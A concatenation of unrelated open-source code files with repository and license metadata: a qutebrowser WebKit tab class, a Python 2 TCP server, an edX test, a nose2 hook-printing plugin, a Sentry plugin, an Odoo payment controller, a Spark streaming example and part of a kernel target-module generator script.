class WebKitTab(browsertab.AbstractTab):
"""A QtWebKit tab in the browser."""
def __init__(self, *, win_id, mode_manager, private, parent=None):
super().__init__(win_id=win_id, mode_manager=mode_manager,
private=private, parent=parent)
widget = webview.WebView(win_id=win_id, tab_id=self.tab_id,
private=private, tab=self)
if private:
self._make_private(widget)
self.history = WebKitHistory(self)
self.scroller = WebKitScroller(self, parent=self)
self.caret = WebKitCaret(win_id=win_id, mode_manager=mode_manager,
tab=self, parent=self)
self.zoom = WebKitZoom(win_id=win_id, parent=self)
self.search = WebKitSearch(parent=self)
self.printing = WebKitPrinting()
self.elements = WebKitElements(self)
self.action = WebKitAction()
self._set_widget(widget)
self._connect_signals()
self.backend = usertypes.Backend.QtWebKit
def _install_event_filter(self):
self._widget.installEventFilter(self._mouse_event_filter)
def _make_private(self, widget):
settings = widget.settings()
settings.setAttribute(QWebSettings.PrivateBrowsingEnabled, True)
def openurl(self, url):
self._openurl_prepare(url)
self._widget.openurl(url)
def url(self, requested=False):
frame = self._widget.page().mainFrame()
if requested:
return frame.requestedUrl()
else:
return frame.url()
def dump_async(self, callback, *, plain=False):
frame = self._widget.page().mainFrame()
if plain:
callback(frame.toPlainText())
else:
callback(frame.toHtml())
def run_js_async(self, code, callback=None, *, world=None):
if world is not None and world != usertypes.JsWorld.jseval:
log.webview.warning("Ignoring world ID {}".format(world))
document_element = self._widget.page().mainFrame().documentElement()
result = document_element.evaluateJavaScript(code)
if callback is not None:
callback(result)
def icon(self):
return self._widget.icon()
def shutdown(self):
self._widget.shutdown()
def reload(self, *, force=False):
if force:
action = QWebPage.ReloadAndBypassCache
else:
action = QWebPage.Reload
self._widget.triggerPageAction(action)
def stop(self):
self._widget.stop()
def title(self):
return self._widget.title()
def clear_ssl_errors(self):
self.networkaccessmanager().clear_all_ssl_errors()
def key_press(self, key, modifier=Qt.NoModifier):
press_evt = QKeyEvent(QEvent.KeyPress, key, modifier, 0, 0, 0)
release_evt = QKeyEvent(QEvent.KeyRelease, key, modifier,
0, 0, 0)
self.send_event(press_evt)
self.send_event(release_evt)
@pyqtSlot()
def _on_history_trigger(self):
url = self.url()
requested_url = self.url(requested=True)
self.add_history_item.emit(url, requested_url, self.title())
def set_html(self, html, base_url=QUrl()):
self._widget.setHtml(html, base_url)
def networkaccessmanager(self):
return self._widget.page().networkAccessManager()
def user_agent(self):
page = self._widget.page()
return page.userAgentForUrl(self.url())
@pyqtSlot()
def _on_frame_load_finished(self):
"""Make sure we emit an appropriate status when loading finished.
        While Qt has a bool "ok" attribute for loadFinished, it is always True
when using error pages... See
https://github.com/qutebrowser/qutebrowser/issues/84
"""
self._on_load_finished(not self._widget.page().error_occurred)
@pyqtSlot()
def _on_webkit_icon_changed(self):
"""Emit iconChanged with a QIcon like QWebEngineView does."""
if sip.isdeleted(self._widget):
log.webview.debug("Got _on_webkit_icon_changed for deleted view!")
return
self.icon_changed.emit(self._widget.icon())
@pyqtSlot(QWebFrame)
def _on_frame_created(self, frame):
"""Connect the contentsSizeChanged signal of each frame."""
# FIXME:qtwebengine those could theoretically regress:
# https://github.com/qutebrowser/qutebrowser/issues/152
# https://github.com/qutebrowser/qutebrowser/issues/263
frame.contentsSizeChanged.connect(self._on_contents_size_changed)
@pyqtSlot(QSize)
def _on_contents_size_changed(self, size):
self.contents_size_changed.emit(QSizeF(size))
def _connect_signals(self):
view = self._widget
page = view.page()
frame = page.mainFrame()
page.windowCloseRequested.connect(self.window_close_requested)
page.linkHovered.connect(self.link_hovered)
page.loadProgress.connect(self._on_load_progress)
frame.loadStarted.connect(self._on_load_started)
view.scroll_pos_changed.connect(self.scroller.perc_changed)
view.titleChanged.connect(self.title_changed)
view.urlChanged.connect(self._on_url_changed)
view.shutting_down.connect(self.shutting_down)
page.networkAccessManager().sslErrors.connect(self._on_ssl_errors)
frame.loadFinished.connect(self._on_frame_load_finished)
view.iconChanged.connect(self._on_webkit_icon_changed)
page.frameCreated.connect(self._on_frame_created)
frame.contentsSizeChanged.connect(self._on_contents_size_changed)
frame.initialLayoutCompleted.connect(self._on_history_trigger)
def event_target(self):
return self._widget
|
gpl-3.0
|
shopmium/titanium_mobile
|
support/android/tcpserver.py
|
37
|
7728
|
#
# BaseServer and TCPServer copied from Python 2.6 to be compatible w/ Python 2.5
#
import os, sys, socket
import select, threading, urllib
class BaseServer:
"""Base class for server classes.
Methods for the caller:
- __init__(server_address, RequestHandlerClass)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you do not use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- server_close()
- process_request(request, client_address)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- allow_reuse_address
Instance variables:
- RequestHandlerClass
- socket
"""
timeout = None
def __init__(self, server_address, RequestHandlerClass):
"""Constructor. May be extended, do not override."""
self.server_address = server_address
self.RequestHandlerClass = RequestHandlerClass
self.__is_shut_down = threading.Event()
self.__serving = False
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
pass
def serve_forever(self, poll_interval=0.5):
"""Handle one request at a time until shutdown.
Polls for shutdown every poll_interval seconds. Ignores
self.timeout. If you need to do periodic tasks, do them in
another thread.
"""
self.__serving = True
self.__is_shut_down.clear()
while self.__serving:
# XXX: Consider using another file descriptor or
# connecting to the socket to wake this up instead of
# polling. Polling reduces our responsiveness to a
# shutdown request and wastes cpu at all other times.
r, w, e = select.select([self], [], [], poll_interval)
if r:
self._handle_request_noblock()
self.__is_shut_down.set()
def shutdown(self):
"""Stops the serve_forever loop.
Blocks until the loop has finished. This must be called while
serve_forever() is running in another thread, or it will
deadlock.
"""
self.__serving = False
self.__is_shut_down.wait()
def shutdown_noblock(self):
""" Stops the server_forever loop but without blocking """
self.__serving = False
def is_serving(self):
return self.__serving
# The distinction between handling, getting, processing and
# finishing a request is fairly arbitrary. Remember:
#
# - handle_request() is the top-level call. It calls
# select, get_request(), verify_request() and process_request()
# - get_request() is different for stream or datagram sockets
# - process_request() is the place that may fork a new process
# or create a new thread to finish the request
# - finish_request() instantiates the request handler class;
# this constructor will handle the request all by itself
def handle_request(self):
"""Handle one request, possibly blocking.
Respects self.timeout.
"""
# Support people who used socket.settimeout() to escape
# handle_request before self.timeout was available.
timeout = self.socket.gettimeout()
if timeout is None:
timeout = self.timeout
elif self.timeout is not None:
timeout = min(timeout, self.timeout)
fd_sets = select.select([self], [], [], timeout)
if not fd_sets[0]:
self.handle_timeout()
return
self._handle_request_noblock()
def _handle_request_noblock(self):
"""Handle one request, without blocking.
I assume that select.select has returned that the socket is
readable before this function was called, so there should be
no risk of blocking in get_request().
"""
try:
request, client_address = self.get_request()
except socket.error:
return
if self.verify_request(request, client_address):
try:
self.process_request(request, client_address)
except:
self.handle_error(request, client_address)
self.close_request(request)
def handle_timeout(self):
"""Called if no new request arrives within self.timeout.
Overridden by ForkingMixIn.
"""
pass
def verify_request(self, request, client_address):
"""Verify the request. May be overridden.
Return True if we should proceed with this request.
"""
return True
def process_request(self, request, client_address):
"""Call finish_request.
Overridden by ForkingMixIn and ThreadingMixIn.
"""
self.finish_request(request, client_address)
self.close_request(request)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
pass
def finish_request(self, request, client_address):
"""Finish one request by instantiating RequestHandlerClass."""
self.RequestHandlerClass(request, client_address, self)
def close_request(self, request):
"""Called to clean up an individual request."""
pass
def handle_error(self, request, client_address):
"""Handle an error gracefully. May be overridden.
The default is to print a traceback and continue.
"""
print '-'*40
print 'Exception happened during processing of request from',
print client_address
import traceback
traceback.print_exc() # XXX But this goes to stderr!
print '-'*40
class TCPServer(BaseServer):
"""Base class for various socket-based server classes.
Defaults to synchronous IP stream (i.e., TCP).
Methods for the caller:
- __init__(server_address, RequestHandlerClass, bind_and_activate=True)
- serve_forever(poll_interval=0.5)
- shutdown()
- handle_request() # if you don't use serve_forever()
- fileno() -> int # for select()
Methods that may be overridden:
- server_bind()
- server_activate()
- get_request() -> request, client_address
- handle_timeout()
- verify_request(request, client_address)
- process_request(request, client_address)
- close_request(request)
- handle_error()
Methods for derived classes:
- finish_request(request, client_address)
Class variables that may be overridden by derived classes or
instances:
- timeout
- address_family
- socket_type
- request_queue_size (only for stream sockets)
- allow_reuse_address
Instance variables:
- server_address
- RequestHandlerClass
- socket
"""
address_family = socket.AF_INET
socket_type = socket.SOCK_STREAM
request_queue_size = 5
allow_reuse_address = False
def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True):
"""Constructor. May be extended, do not override."""
BaseServer.__init__(self, server_address, RequestHandlerClass)
self.socket = socket.socket(self.address_family,
self.socket_type)
if bind_and_activate:
self.server_bind()
self.server_activate()
def server_bind(self):
"""Called by constructor to bind the socket.
May be overridden.
"""
if self.allow_reuse_address:
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind(self.server_address)
self.server_address = self.socket.getsockname()
def server_activate(self):
"""Called by constructor to activate the server.
May be overridden.
"""
self.socket.listen(self.request_queue_size)
def server_close(self):
"""Called to clean-up the server.
May be overridden.
"""
self.socket.close()
def fileno(self):
"""Return socket file number.
Interface required by select().
"""
return self.socket.fileno()
def get_request(self):
"""Get the request and client address from the socket.
May be overridden.
"""
return self.socket.accept()
def close_request(self, request):
"""Called to clean up an individual request."""
request.close()
def finish(self):
pass
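
# Minimal usage sketch (illustrative, not part of the build scripts).
# EchoHandler is a hypothetical RequestHandlerClass: per the BaseServer
# docstring, finish_request() instantiates it once per accepted request.
class EchoHandler:
    def __init__(self, request, client_address, server):
        data = request.recv(1024)       # read one chunk from the client
        request.sendall(data)           # echo it back

def _echo_demo():
    server = TCPServer(('127.0.0.1', 0), EchoHandler)  # port 0: any free port
    print 'echo server on %s:%d' % server.server_address
    server.handle_request()    # blocks until one client connects, then returns
    server.server_close()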
|
apache-2.0
|
abo-abo/edx-platform
|
common/lib/xmodule/xmodule/tests/xml/test_inheritance.py
|
49
|
1071
|
"""
Test that inherited fields work correctly when parsing XML
"""
from nose.tools import assert_equals # pylint: disable=no-name-in-module
from xmodule.tests.xml import XModuleXmlImportTest
from xmodule.tests.xml.factories import CourseFactory, SequenceFactory, ProblemFactory
class TestInheritedFieldParsing(XModuleXmlImportTest):
"""
Test that inherited fields work correctly when parsing XML
"""
def test_null_string(self):
# Test that the string inherited fields are passed through 'deserialize_field',
# which converts the string "null" to the python value None
root = CourseFactory.build(days_early_for_beta="null")
sequence = SequenceFactory.build(parent=root)
ProblemFactory.build(parent=sequence)
course = self.process_xml(root)
assert_equals(None, course.days_early_for_beta)
sequence = course.get_children()[0]
assert_equals(None, sequence.days_early_for_beta)
problem = sequence.get_children()[0]
assert_equals(None, problem.days_early_for_beta)
|
agpl-3.0
|
dhenrygithub/QGIS
|
python/ext-libs/nose2/plugins/printhooks.py
|
11
|
1767
|
"""
This plugin is primarily useful for plugin authors who want to debug
their plugins.
It prints each hook that is called to stderr, along with details of
the event that was passed to the hook.
To do that, this plugin overrides :meth:`nose2.events.Plugin.register`
and, after registration, replaces all existing
:class:`nose2.events.Hook` instances in ``session.hooks`` with
instances of a Hook subclass that prints information about each call.
"""
import sys
from nose2 import events
INDENT = []
__unittest = True
class PrintHooks(events.Plugin):
"""Print hooks as they are called"""
configSection = 'print-hooks'
commandLineSwitch = ('P', 'print-hooks',
'Print names of hooks in order of execution')
def register(self):
"""Override to inject noisy hook instances.
Replaces Hook instances in ``self.session.hooks.hooks`` with
noisier objects.
"""
super(PrintHooks, self).register()
# now we can be sure that all other plugins have loaded
# and this plugin is active, patch in our hook class
self.session.hooks.hookClass = NoisyHook
for attr, hook in self.session.hooks.hooks.items():
newhook = NoisyHook(attr)
newhook.plugins = hook.plugins
self.session.hooks.hooks[attr] = newhook
class NoisyHook(events.Hook):
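    """A Hook subclass that reports each call (indented by depth) to stderr
    before delegating to the real hook implementations."""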
def __call__(self, event):
_report(self.method, event)
_indent()
try:
return super(NoisyHook, self).__call__(event)
finally:
_dedent()
def _report(method, event):
sys.stderr.write("\n%s%s: %s" % (''.join(INDENT), method, event))
def _indent():
INDENT.append(' ')
def _dedent():
if INDENT:
INDENT.pop()
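
# Illustrative note (not part of the plugin): with the plugin enabled via
# ``-P`` / ``--print-hooks``, every hook call is written to stderr, indented
# by nesting depth because _indent()/_dedent() bracket the superclass call.
# Hypothetical (abbreviated) output:
#
#   handleArgs: CommandLineArgsEvent(...)
#     createTests: CreateTestsEvent(...)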
|
gpl-2.0
|
JTCunning/sentry
|
src/sentry/plugins/sentry_urls/models.py
|
13
|
1027
|
"""
sentry.plugins.sentry_urls.models
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
import sentry
from django.utils.translation import ugettext_lazy as _
from sentry.plugins import register
from sentry.plugins.bases.tag import TagPlugin
class UrlsPlugin(TagPlugin):
"""
Automatically adds the 'url' tag from events containing interface data
from ``sentry.interfaces.Http``.
"""
slug = 'urls'
title = _('Auto Tag: URLs')
version = sentry.VERSION
author = "Sentry Team"
author_url = "https://github.com/getsentry/sentry"
tag = 'url'
tag_label = _('URL')
project_default_enabled = True
def get_tag_values(self, event):
http = event.interfaces.get('sentry.interfaces.Http')
if not http:
return []
if not http.url:
return []
return [http.url]
register(UrlsPlugin)
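
# Illustrative sketch (not sentry code): TagPlugin subclasses only supply tag
# values; the base class handles storing and displaying them. For a
# hypothetical event whose 'sentry.interfaces.Http' interface has url set:
#
#     UrlsPlugin().get_tag_values(event)  # -> ['https://example.com/checkout']
#
# Events without an Http interface, or with an empty url, yield [].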
|
bsd-3-clause
|
LeartS/odoo
|
addons/payment_ogone/controllers/main.py
|
389
|
1179
|
# -*- coding: utf-8 -*-
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
_logger = logging.getLogger(__name__)
class OgoneController(http.Controller):
_accept_url = '/payment/ogone/test/accept'
_decline_url = '/payment/ogone/test/decline'
_exception_url = '/payment/ogone/test/exception'
_cancel_url = '/payment/ogone/test/cancel'
@http.route([
'/payment/ogone/accept', '/payment/ogone/test/accept',
'/payment/ogone/decline', '/payment/ogone/test/decline',
'/payment/ogone/exception', '/payment/ogone/test/exception',
'/payment/ogone/cancel', '/payment/ogone/test/cancel',
], type='http', auth='none')
def ogone_form_feedback(self, **post):
""" Ogone contacts using GET, at least for accept """
_logger.info('Ogone: entering form_feedback with post data %s', pprint.pformat(post)) # debug
cr, uid, context = request.cr, SUPERUSER_ID, request.context
request.registry['payment.transaction'].form_feedback(cr, uid, post, 'ogone', context=context)
return werkzeug.utils.redirect(post.pop('return_url', '/'))
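
# Illustrative note (not odoo code): Ogone calls these endpoints with GET
# parameters describing the transaction outcome; form_feedback() validates
# them and updates the matching payment.transaction record before the user
# is redirected to return_url. A hypothetical accept callback (parameter
# names are assumptions based on Ogone's e-Commerce API):
#
#   GET /payment/ogone/accept?ORDERID=SO042&STATUS=9&PAYID=1337&return_url=/shop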
|
agpl-3.0
|
rednaxelafx/apache-spark
|
examples/src/main/python/streaming/queue_stream.py
|
150
|
1763
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
Create a queue of RDDs that will be mapped/reduced one at a time, at
1-second intervals.
To run this example, use:
   `$ bin/spark-submit examples/src/main/python/streaming/queue_stream.py`
"""
import time
from pyspark import SparkContext
from pyspark.streaming import StreamingContext
if __name__ == "__main__":
sc = SparkContext(appName="PythonStreamingQueueStream")
ssc = StreamingContext(sc, 1)
# Create the queue through which RDDs can be pushed to
# a QueueInputDStream
rddQueue = []
for i in range(5):
rddQueue += [ssc.sparkContext.parallelize([j for j in range(1, 1001)], 10)]
# Create the QueueInputDStream and use it do some processing
inputStream = ssc.queueStream(rddQueue)
mappedStream = inputStream.map(lambda x: (x % 10, 1))
reducedStream = mappedStream.reduceByKey(lambda a, b: a + b)
reducedStream.pprint()
ssc.start()
time.sleep(6)
ssc.stop(stopSparkContext=True, stopGraceFully=True)
|
apache-2.0
|
vasudev-33/os
|
Documentation/target/tcm_mod_builder.py
|
3119
|
42754
|
#!/usr/bin/python
# The TCM v4 multi-protocol fabric module generation script for drivers/target/$NEW_MOD
#
# Copyright (c) 2010 Rising Tide Systems
# Copyright (c) 2010 Linux-iSCSI.org
#
# Author: [email protected]
#
import os, sys
import subprocess as sub
import string
import re
import optparse
tcm_dir = ""
fabric_ops = []
fabric_mod_dir = ""
fabric_mod_port = ""
fabric_mod_init_port = ""
def tcm_mod_err(msg):
print msg
sys.exit(1)
def tcm_mod_create_module_subdir(fabric_mod_dir_var):
if os.path.isdir(fabric_mod_dir_var) == True:
return 1
print "Creating fabric_mod_dir: " + fabric_mod_dir_var
ret = os.mkdir(fabric_mod_dir_var)
if ret:
tcm_mod_err("Unable to mkdir " + fabric_mod_dir_var)
return
def tcm_mod_build_FC_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for FC Initiator Nport */\n"
buf += " u64 nport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Initiator Nport */\n"
buf += " char nport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* FC lport target portal group tag for TCM */\n"
buf += " u16 lport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_lport */\n"
buf += " struct " + fabric_mod_name + "_lport *lport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_lport {\n"
buf += " /* SCSI protocol the lport is providing */\n"
buf += " u8 lport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for FC Target Lport */\n"
buf += " u64 lport_wwpn;\n"
buf += " /* ASCII formatted WWPN for FC Target Lport */\n"
buf += " char lport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_lport() */\n"
buf += " struct se_wwn lport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "lport"
fabric_mod_init_port = "nport"
return
def tcm_mod_build_SAS_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* Binary World Wide unique Port Name for SAS Initiator port */\n"
buf += " u64 iport_wwpn;\n"
buf += " /* ASCII formatted WWPN for Sas Initiator port */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* SAS port target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* Binary World Wide unique Port Name for SAS Target port */\n"
buf += " u64 tport_wwpn;\n"
buf += " /* ASCII formatted WWPN for SAS Target port */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_iSCSI_include(fabric_mod_dir_var, fabric_mod_name):
global fabric_mod_port
global fabric_mod_init_port
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_base.h"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#define " + fabric_mod_name.upper() + "_VERSION \"v0.1\"\n"
buf += "#define " + fabric_mod_name.upper() + "_NAMELEN 32\n"
buf += "\n"
buf += "struct " + fabric_mod_name + "_nacl {\n"
buf += " /* ASCII formatted InitiatorName */\n"
buf += " char iport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_nodeacl() */\n"
buf += " struct se_node_acl se_node_acl;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tpg {\n"
buf += " /* iSCSI target portal group tag for TCM */\n"
buf += " u16 tport_tpgt;\n"
buf += " /* Pointer back to " + fabric_mod_name + "_tport */\n"
buf += " struct " + fabric_mod_name + "_tport *tport;\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tpg() */\n"
buf += " struct se_portal_group se_tpg;\n"
buf += "};\n\n"
buf += "struct " + fabric_mod_name + "_tport {\n"
buf += " /* SCSI protocol the tport is providing */\n"
buf += " u8 tport_proto_id;\n"
buf += " /* ASCII formatted TargetName for IQN */\n"
buf += " char tport_name[" + fabric_mod_name.upper() + "_NAMELEN];\n"
buf += " /* Returned by " + fabric_mod_name + "_make_tport() */\n"
buf += " struct se_wwn tport_wwn;\n"
buf += "};\n"
ret = p.write(buf)
if ret:
tcm_mod_err("Unable to write f: " + f)
p.close()
fabric_mod_port = "tport"
fabric_mod_init_port = "iport"
return
def tcm_mod_build_base_includes(proto_ident, fabric_mod_dir_val, fabric_mod_name):
if proto_ident == "FC":
tcm_mod_build_FC_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "SAS":
tcm_mod_build_SAS_include(fabric_mod_dir_val, fabric_mod_name)
elif proto_ident == "iSCSI":
tcm_mod_build_iSCSI_include(fabric_mod_dir_val, fabric_mod_name)
else:
print "Unsupported proto_ident: " + proto_ident
sys.exit(1)
return
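# Note (summary of the three builders above, not part of the original script):
# the generated <name>_base.h differs per protocol mainly in the port naming -
# FC uses lport/nport while SAS and iSCSI use tport/iport - which is why each
# builder sets the fabric_mod_port / fabric_mod_init_port globals consumed by
# the configfs and fabric-ops generators below.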
def tcm_mod_build_configfs(proto_ident, fabric_mod_dir_var, fabric_mod_name):
buf = ""
f = fabric_mod_dir_var + "/" + fabric_mod_name + "_configfs.c"
print "Writing file: " + f
p = open(f, 'w');
if not p:
tcm_mod_err("Unable to open file: " + f)
buf = "#include <linux/module.h>\n"
buf += "#include <linux/moduleparam.h>\n"
buf += "#include <linux/version.h>\n"
buf += "#include <generated/utsrelease.h>\n"
buf += "#include <linux/utsname.h>\n"
buf += "#include <linux/init.h>\n"
buf += "#include <linux/slab.h>\n"
buf += "#include <linux/kthread.h>\n"
buf += "#include <linux/types.h>\n"
buf += "#include <linux/string.h>\n"
buf += "#include <linux/configfs.h>\n"
buf += "#include <linux/ctype.h>\n"
buf += "#include <asm/unaligned.h>\n\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/target_core_transport.h>\n"
buf += "#include <target/target_core_fabric_ops.h>\n"
buf += "#include <target/target_core_fabric_configfs.h>\n"
buf += "#include <target/target_core_fabric_lib.h>\n"
buf += "#include <target/target_core_device.h>\n"
buf += "#include <target/target_core_tpg.h>\n"
buf += "#include <target/target_core_configfs.h>\n"
buf += "#include <target/target_core_base.h>\n"
buf += "#include <target/configfs_macros.h>\n\n"
buf += "#include \"" + fabric_mod_name + "_base.h\"\n"
buf += "#include \"" + fabric_mod_name + "_fabric.h\"\n\n"
buf += "/* Local pointer to allocated TCM configfs fabric module */\n"
buf += "struct target_fabric_configfs *" + fabric_mod_name + "_fabric_configfs;\n\n"
buf += "static struct se_node_acl *" + fabric_mod_name + "_make_nodeacl(\n"
buf += " struct se_portal_group *se_tpg,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct se_node_acl *se_nacl, *se_nacl_new;\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl;\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " u64 wwpn = 0;\n"
buf += " u32 nexus_depth;\n\n"
buf += " /* " + fabric_mod_name + "_parse_wwn(name, &wwpn, 1) < 0)\n"
buf += " return ERR_PTR(-EINVAL); */\n"
buf += " se_nacl_new = " + fabric_mod_name + "_alloc_fabric_acl(se_tpg);\n"
buf += " if (!(se_nacl_new))\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += "//#warning FIXME: Hardcoded nexus depth in " + fabric_mod_name + "_make_nodeacl()\n"
buf += " nexus_depth = 1;\n"
buf += " /*\n"
buf += " * se_nacl_new may be released by core_tpg_add_initiator_node_acl()\n"
buf += " * when converting a NodeACL from demo mode -> explict\n"
buf += " */\n"
buf += " se_nacl = core_tpg_add_initiator_node_acl(se_tpg, se_nacl_new,\n"
buf += " name, nexus_depth);\n"
buf += " if (IS_ERR(se_nacl)) {\n"
buf += " " + fabric_mod_name + "_release_fabric_acl(se_tpg, se_nacl_new);\n"
buf += " return se_nacl;\n"
buf += " }\n"
buf += " /*\n"
buf += " * Locate our struct " + fabric_mod_name + "_nacl and set the FC Nport WWPN\n"
buf += " */\n"
buf += " nacl = container_of(se_nacl, struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
if proto_ident == "FC" or proto_ident == "SAS":
buf += " nacl->" + fabric_mod_init_port + "_wwpn = wwpn;\n"
buf += " /* " + fabric_mod_name + "_format_wwn(&nacl->" + fabric_mod_init_port + "_name[0], " + fabric_mod_name.upper() + "_NAMELEN, wwpn); */\n\n"
buf += " return se_nacl;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_nodeacl(struct se_node_acl *se_acl)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_nacl *nacl = container_of(se_acl,\n"
buf += " struct " + fabric_mod_name + "_nacl, se_node_acl);\n"
buf += " core_tpg_del_initiator_node_acl(se_acl->se_tpg, se_acl, 1);\n"
buf += " kfree(nacl);\n"
buf += "}\n\n"
buf += "static struct se_portal_group *" + fabric_mod_name + "_make_tpg(\n"
buf += " struct se_wwn *wwn,\n"
buf += " struct config_group *group,\n"
buf += " const char *name)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + "*" + fabric_mod_port + " = container_of(wwn,\n"
buf += " struct " + fabric_mod_name + "_" + fabric_mod_port + ", " + fabric_mod_port + "_wwn);\n\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg;\n"
buf += " unsigned long tpgt;\n"
buf += " int ret;\n\n"
buf += " if (strstr(name, \"tpgt_\") != name)\n"
buf += " return ERR_PTR(-EINVAL);\n"
buf += " if (strict_strtoul(name + 5, 10, &tpgt) || tpgt > UINT_MAX)\n"
buf += " return ERR_PTR(-EINVAL);\n\n"
buf += " tpg = kzalloc(sizeof(struct " + fabric_mod_name + "_tpg), GFP_KERNEL);\n"
buf += " if (!(tpg)) {\n"
buf += " printk(KERN_ERR \"Unable to allocate struct " + fabric_mod_name + "_tpg\");\n"
buf += " return ERR_PTR(-ENOMEM);\n"
buf += " }\n"
buf += " tpg->" + fabric_mod_port + " = " + fabric_mod_port + ";\n"
buf += " tpg->" + fabric_mod_port + "_tpgt = tpgt;\n\n"
buf += " ret = core_tpg_register(&" + fabric_mod_name + "_fabric_configfs->tf_ops, wwn,\n"
buf += " &tpg->se_tpg, (void *)tpg,\n"
buf += " TRANSPORT_TPG_TYPE_NORMAL);\n"
buf += " if (ret < 0) {\n"
buf += " kfree(tpg);\n"
buf += " return NULL;\n"
buf += " }\n"
buf += " return &tpg->se_tpg;\n"
buf += "}\n\n"
buf += "static void " + fabric_mod_name + "_drop_tpg(struct se_portal_group *se_tpg)\n"
buf += "{\n"
buf += " struct " + fabric_mod_name + "_tpg *tpg = container_of(se_tpg,\n"
buf += " struct " + fabric_mod_name + "_tpg, se_tpg);\n\n"
buf += " core_tpg_deregister(se_tpg);\n"
buf += " kfree(tpg);\n"
buf += "}\n\n"
buf += "static struct se_wwn *" + fabric_mod_name + "_make_" + fabric_mod_port + "(\n"
